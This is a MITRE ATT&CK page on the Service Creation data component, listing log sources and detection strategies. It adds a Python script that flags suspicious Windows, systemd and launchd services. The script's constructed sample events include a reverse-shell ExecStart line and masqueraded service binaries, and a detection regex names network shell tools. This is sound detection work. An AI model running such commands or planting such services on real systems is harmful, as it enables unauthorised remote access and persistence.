
DC0060 Service Creation

Item            Value
ID              DC0060
Version         2.0
Created         20 October 2021
Last Modified   12 November 2025

Log Sources

Name                               Channel
auditd:CONFIG_CHANGE               creation or modification of systemd services
containerLogs:systemd_unit_files   unit file referencing container binary with persistent flags
kubernetes:audit                   create
linux:osquery                      newly registered unit file with ExecStart pointing to unknown binary
linux:syslog                       systemctl start/enable with uncommon binary paths
macos:osquery                      Process Events and Launch Daemons
macos:osquery                      launch_daemons
macos:osquery                      detection of new launch agents with suspicious paths or unsigned binaries
macos:unifiedlog                   creation or loading of new launchd services
macos:unifiedlog                   launchd loading new LaunchDaemon or changes to existing daemon configuration
Service                            None
WinEventLog:Security               EventCode=4697
WinEventLog:System                 EventCode=7036
WinEventLog:System                 EventCode=7045
WinEventLog:System                 EventCode=7031, 7034
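The channels above say what each source captures; the checks below show how a defender reads them together once the events are collected. This is an added example, not part of this ATT&CK page and not MITRE's code: it triages constructed events in the shapes those sources emit (a Windows System 7045 and Security 4697 service-install record, a systemd unit file's ExecStart, and a launchd plist). The directory lists, expected-path map, service-name set, staging regex and every sample event are assumptions made for the example, not values taken from the page, and would be tuned to the estate being monitored.

```python
"""Triage of service-creation telemetry from the log sources listed above.
Added example, not part of the ATT&CK page. All events are constructed; the directory
lists, expected-path map and service-name set are assumptions a defender would tune."""
import plistlib
import re

WIN_USER_WRITABLE = ("c:\\users\\", "\\temp\\", "\\downloads\\", "c:\\perflogs\\")
WIN_INTERPRETERS = {"cmd.exe", "powershell.exe", "rundll32.exe", "regsvr32.exe", "mshta.exe", "wscript.exe"}
WIN_SYSTEM_NAMES = {"svchost.exe", "lsass.exe", "csrss.exe", "services.exe", "spoolsv.exe"}
WIN_EXPECTED_PATH = {"spooler": "c:\\windows\\system32\\spoolsv.exe",
                     "wuauserv": "c:\\windows\\system32\\svchost.exe"}
WIN_REMOTE_EXEC_SERVICES = {"psexesvc"}  # service name PsExec installs on the target
NIX_UNTRUSTED = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/", "/Users/", "/private/tmp/")
NIX_TRUSTED = ("/usr/bin/", "/usr/sbin/", "/bin/", "/sbin/", "/usr/lib/", "/usr/local/", "/opt/")
STAGING = re.compile(r"curl |wget |base64|/dev/tcp|bash -i|nc -e")

def windows_exe(image_path):
    """Reduce a 7045 ImagePath / 4697 ServiceFileName to its lower-cased executable."""
    p = re.sub(r"%(systemroot|windir)%", lambda m: "c:\\windows", image_path.strip(), flags=re.I)
    p = p[1:].split('"', 1)[0] if p.startswith('"') else p.split(" ", 1)[0]
    return p.lower()

def triage_windows(ev):
    """System 7045 carries ImagePath; Security 4697 carries ServiceFileName."""
    name = ev.get("ServiceName", "").lower()
    exe = windows_exe(ev.get("ImagePath") or ev.get("ServiceFileName", ""))
    base = exe.rsplit("\\", 1)[-1]
    checks = [
        (any(d in exe for d in WIN_USER_WRITABLE), "service binary in a user-writable directory"),
        (base in WIN_INTERPRETERS, "service runs an interpreter or LOLBin instead of a service binary"),
        (base in WIN_SYSTEM_NAMES and not exe.startswith("c:\\windows\\"),
         "system binary name outside the Windows directory"),
        (name in WIN_EXPECTED_PATH and exe != WIN_EXPECTED_PATH[name],
         "well-known service name pointing at an unexpected binary"),
        (name in WIN_REMOTE_EXEC_SERVICES, "service name used by a remote-execution tool"),
    ]
    return [why for hit, why in checks if hit]

def triage_systemd(unit_path, unit_text):
    """Unit-file checks (linux:osquery, auditd CONFIG_CHANGE on unit files)."""
    m = re.search(r"^\s*ExecStart\s*=\s*[-@:+!]*(.+)$", unit_text, re.M)  # first ExecStart=
    if not m:
        return []
    cmd = m.group(1).strip()
    exe = cmd.split()[0]
    checks = [
        (exe.startswith(NIX_UNTRUSTED), "ExecStart binary in a user-writable directory"),
        (not exe.startswith(NIX_UNTRUSTED + NIX_TRUSTED),
         "ExecStart binary outside standard system directories"),
        (bool(STAGING.search(cmd)), "command downloads, decodes or connects out at start"),
        ("/.config/systemd/user/" in unit_path, "user-level unit (persists without root)"),
    ]
    return [why for hit, why in checks if hit]

def triage_launchd(plist_path, plist_bytes):
    """LaunchDaemon/LaunchAgent plist checks (macos:osquery launch_daemons, unifiedlog)."""
    data = plistlib.loads(plist_bytes)
    exe = data.get("Program") or (data.get("ProgramArguments") or [""])[0]
    checks = [
        (exe.startswith(NIX_UNTRUSTED), "program in a user-writable directory"),
        (bool(data.get("RunAtLoad") and data.get("KeepAlive")),
         "RunAtLoad with KeepAlive: starts at boot and restarts if killed"),
        (str(data.get("Label", "")).startswith("com.apple.") and not plist_path.startswith("/System/"),
         "Apple-style label in a third-party launchd directory"),
    ]
    return [why for hit, why in checks if hit]

def triage(ev):
    """Route one event by the log-source name used in the table above."""
    if ev["source"].startswith("WinEventLog:"):
        return triage_windows(ev)
    if ev["source"].startswith("linux:"):
        return triage_systemd(ev["path"], ev["content"])
    return triage_launchd(ev["path"], ev["content"])

SAMPLE_EVENTS = [  # constructed for this example, not real telemetry
    {"source": "WinEventLog:System", "EventCode": 7045, "ServiceName": "wuauserv",
     "ImagePath": '"C:\\Users\\Public\\svchost.exe" -k netsvcs'},
    {"source": "WinEventLog:System", "EventCode": 7045, "ServiceName": "Spooler",
     "ImagePath": "C:\\Windows\\System32\\spoolsv.exe"},
    {"source": "WinEventLog:Security", "EventCode": 4697, "ServiceName": "PSEXESVC",
     "ServiceFileName": "%SystemRoot%\\PSEXESVC.exe"},
    {"source": "WinEventLog:System", "EventCode": 7045, "ServiceName": "Updater",
     "ImagePath": "%SystemRoot%\\system32\\cmd.exe /c start /b C:\\Users\\Public\\a.bat"},
    {"source": "linux:osquery", "path": "/etc/systemd/system/dbus-org.freedesktop.update.service",
     "content": "[Service]\nExecStart=/tmp/.x/update --daemon\nRestart=always\n"},
    {"source": "linux:osquery", "path": "/home/dev/.config/systemd/user/sync.service",
     "content": "[Service]\nExecStart=/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.5/4444 0>&1'\n"},
    {"source": "macos:osquery", "path": "/Library/LaunchDaemons/com.apple.softwareupdated.plist",
     "content": b'<plist version="1.0"><dict><key>Label</key><string>com.apple.softwareupdated</string>'
                b"<key>ProgramArguments</key><array><string>/Users/Shared/.update/agent</string></array>"
                b"<key>RunAtLoad</key><true/><key>KeepAlive</key><true/></dict></plist>"},
]

def run(events=SAMPLE_EVENTS):
    """Map each flagged service (ServiceName, or unit/plist path) to the reasons it raised."""
    return {ev.get("ServiceName") or ev["path"]: r for ev in events if (r := triage(ev))}

if __name__ == "__main__":
    print(run())
```

Running the file prints one entry per flagged service; the Spooler event, which points at the binary expected for that name, raises nothing. The checks only cover the creation-time channels (4697, 7045, unit files, plists). EventCode 7036 records service start/stop state changes and 7031/7034 record unexpected terminations, so those rows of the table are the follow-on signals for a service that was stopped or crashed rather than evidence of creation.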

Detection Strategy

ID Name Technique Detected
DET0496 Behavior-Chain Detection for Remote Access Tools (Tool-Agnostic) T1219
DET0021 Behavioral Detection for Service Stop across Platforms T1489
DET0089 Behavioral Detection of Keylogging Activity Across Platforms T1056.001
DET0127 Behavioral Detection of Masquerading Across Platforms via Metadata and Execution Discrepancy T1036
DET0098 Detect abuse of Windows BITS Jobs for download, execution and persistence T1197
DET0462 Detect LLMNR/NBT-NS Poisoning and SMB Relay on Windows T1557.001
DET0473 Detect persistent or elevated container services via container runtime or cluster manipulation T1543.005
DET0588 Detection for Remote Service Session Hijacking for RDP. T1563.002
DET0311 Detection for Spoofing Security Alerting across OS Platforms T1562.011
DET0764 Detection of Adversary-in-the-Middle T0830
DET0497 Detection of Impair Defenses through Disabled or Modified Tools across OS Platforms. T1562.001
DET0377 Detection of Kernel/User-Level Rootkit Behavior Across Platforms T1014
DET0434 Detection of Launch Agent Creation or Modification on macOS T1543.001
DET0117 Detection of Masqueraded Tasks or Services with Suspicious Naming and Execution T1036.004
DET0725 Detection of Masquerading T0849
DET0571 Detection of System Process Creation or Modification Across Platforms T1543
DET0253 Detection of Systemd Service Creation or Modification on Linux T1543.002
DET0552 Detection of Windows Service Creation or Modification T1543.003
DET0304 Detection Strategy for Endpoint DoS via Application or System Exploitation T1499.004
DET0321 Detection Strategy for Hidden Virtual Instance Execution T1564.006
DET0436 Detection Strategy for Hijack Execution Flow through Services File Permissions Weakness. T1574.010
DET0317 Detection Strategy for Impair Defenses Across Platforms T1562
DET0401 Detection Strategy for Launch Daemon Creation or Modification (macOS) T1543.004
DET0314 Detection Strategy for Network Sniffing Across Platforms T1040
DET0279 Detection Strategy for System Services across OS platforms. T1569
DET0421 Detection Strategy for System Services Service Execution T1569.002
DET0265 Detection Strategy for System Services: Launchctl T1569.001
DET0073 Detection Strategy for System Services: Systemctl T1569.003
DET0075 Internal Proxy Behavior via Lateral Host-to-Host C2 Relay T1090.001
DET0162 Socket-filter trigger → on-host raw-socket activity → reverse connection (T1205.002) T1205.002